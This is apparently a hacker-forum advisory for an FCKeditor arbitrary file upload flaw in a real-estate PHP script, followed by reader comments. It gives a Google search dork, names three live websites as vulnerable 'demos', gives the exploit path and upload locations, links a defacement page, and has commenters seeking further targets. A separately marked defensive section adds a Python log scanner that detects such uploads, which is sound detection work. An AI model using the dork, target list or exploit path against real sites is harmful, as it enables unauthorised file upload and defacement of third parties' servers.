
FCKEditor Vulnerability

Author : KaCaK
HomePage : http://www.griadamlar.com
Web App.Name : MEFE EMLAK SCRIPT
Price : N/A
Version : N/A
Software: http://emlak.mefe.net/
Vulnerability Style : File Upload
Bug : File Upload
Google Keyword : inurl:advert_detail.php?id=

Demos :
http://www.emlax.de/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.dogoturizm.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.atlantagrup.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Exploitation | (FCKeditor) Arbitrary File Upload :
http://$Site/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

File Uploaded Link :
http://$site/$path/files
http://$site/files
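
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web server access logs for clients that reached the FCKeditor file browser or its PHP connector and then fetched content from a `files` directory. The log lines are constructed, and the combined log format, the `connector.php` location under `browser/default/` and the verdict names are assumptions.

```python
import re

# Constructed sample in Apache combined log format; IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2011:10:01:02 +0000] "GET /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:01:40 +0000] "POST /admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Type=File HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:02:05 +0000] "GET /files/index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2011:10:03:00 +0000] "GET /files/brochure.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2011:10:04:00 +0000] "GET /admin/FCKeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Paths taken from the advisory: the file browser page and its PHP connector.
FILEMANAGER_RE = re.compile(r"/fckeditor/editor/filemanager/.*(?:browser\.html|connector\.php)", re.I)
# Upload locations named in the advisory: /files or /<path>/files.
UPLOAD_DIR_RE = re.compile(r"^/(?:[^?#]*/)?files/", re.I)


def scan(log_text):
    """Return {client_ip: verdict} for clients that touched the file manager."""
    state = {}  # ip -> flags gathered in log order
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, method, url = m.group(1, 2, 3)
        ok = 200 <= int(m.group(4)) < 300
        path = url.split("?", 1)[0]
        if FILEMANAGER_RE.search(path):
            s = state.setdefault(ip, {"reached": False, "posted": False, "fetched": False})
            s["reached"] |= ok
            s["posted"] |= ok and method == "POST" and path.lower().endswith("connector.php")
        elif ip in state and state[ip]["posted"] and ok and UPLOAD_DIR_RE.match(path):
            state[ip]["fetched"] = True  # same client read from the upload directory afterwards
    verdicts = {}
    for ip, s in state.items():
        if s["posted"] and s["fetched"]:
            verdicts[ip] = "upload-suspected"
        elif s["reached"]:
            verdicts[ip] = "file-manager-exposed"
        else:
            verdicts[ip] = "probe-blocked"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG).items():
        print(ip, verdict)
```

A `file-manager-exposed` verdict on its own already means the admin file browser answers unauthenticated requests and should be removed or placed behind authentication.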

Live Preview :

http://www.emlax.de/files/binushacker/binushacker.html

./BinusHacker Defacement


9 comments

  1. A deface, huh??
    Whoa... hahaha
    Awesome, bro..

  2. Bro… is the format like this or not? http://www.alperenemlak.biz/files/endonesamerdeka.htm

    Why do I keep getting an error when I access it?

    Thanks for the answer..

  3. @ Elnewbie : For the site you mean, FCKEditor is no longer vulnerable…
    because there are no permissions to create files or new folders

  4. @acizninja :

    Ohh… I see… thanks for the answer…

  5. Just found it, huh…
    Nice

  6. Just looking around. Checking in, bro.

  7. @dujonk : please take a look at binus hacker, my connection isn't cooperating right now 🙁
